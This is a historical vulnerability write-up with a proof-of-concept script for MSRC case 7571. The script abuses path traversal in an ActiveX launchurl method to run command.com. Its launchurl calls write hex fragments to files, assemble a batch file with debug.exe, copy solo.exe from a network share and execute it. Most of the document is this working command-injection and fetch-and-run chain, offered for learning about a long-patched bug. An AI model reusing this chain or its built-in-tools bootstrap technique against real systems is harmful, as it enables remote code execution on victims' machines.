MSRC 7571 Variation: Another Method to Run Remote Files

While working on MSRC case 7571 — which involved using a vulnerable launchurl method to run local executables — I found a variation that went further: it was possible to use the same technique to assemble a small binary using the debug command, fetch a remote file from a network share, and then execute it. This is the proof-of-concept script showing that chain of steps, each driven by repeated launchurl calls to command.com.

// Creates file d1 on Desktop containing (as text) these bytes: e 100 63 6F 70 79 20 5C 5C 31 32 37 2E 30 2E 30 2E 31 5C 74 65 73 74 5C 73 6F
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo e 100 63 6F 70 79 20 5C 5C 31 32 37 2E 30 2E 30 2E 31 5C 74 65 73 74 5C 73 6F>d1\x0d .cmd');

// Creates file d2 on Desktop containing (as text) these bytes: e 118 6C 6F 2E 65 78 65
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo e 118 6C 6F 2E 65 78 65>d2\x0d .cmd');

// Creates file d3 on Desktop containing these bytes: rip
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo rip>d3\x0d .cmd');

// Creates file d4 on Desktop containing these bytes: 100
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo 100>d4\x0d .cmd');

// Creates file d5 on Desktop containing these bytes: rcx
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo rcx>d5\x0d .cmd');

// Creates file d6 on Desktop containing these bytes: 1e
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo 1e>d6\x0d .cmd');

// Creates file d7 on Desktop containing these bytes: d 100
// This command is just for me, to debug. We don't really need it.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo d 100>d7\x0d .cmd');

// Creates file d8 on Desktop containing these bytes: n getremotefile.bat>d8
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo n getremotefile.bat>d8\x0d .cmd');

// Creates file d9 on Desktop containing these bytes: w
// We can just quit (close the cmd window) after this, but for this test, I left it open.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo w>d9\x0d .cmd');

// Creates file debug.txt on Desktop width all the previous files concatenated.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C copy d1+d2+d3+d4+d5+d6+d7+d8+d9 debug.txt\x0d .cmd');

// Executes the debug which receives the "debug.txt" and executes all those commands,
// creating another file called "getremotefile.bat" which contains this: copy \\127.0.0.1\test\solo.exe
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C debug < debug.txt\x0d .cmd');

// Executes the getremotefile.bat, copying the remote file to the desktop.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C getremotefile.bat\x0d .cmd');

// Executes the downloaded remote file.
obj1.launchurl('http://www.google.com%../../../../solo.exe " .cmd');

The underlying primitive is a launchurl method on a vulnerable ActiveX control (obj1) that accepts a URL but can be manipulated with a path traversal (%../../../../) to invoke command.com instead of a browser navigation. Each call writes a small fragment of a debug.exe script to a separate file on the Desktop. Once all fragments are assembled and concatenated into debug.txt, the debug command (a legacy DOS binary assembler) interprets the hex bytes and writes out a batch file (getremotefile.bat) that copies an executable from a network share. The final call runs that executable. It is a multi-step bootstrap chain that relies entirely on tools already present in a standard Windows installation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.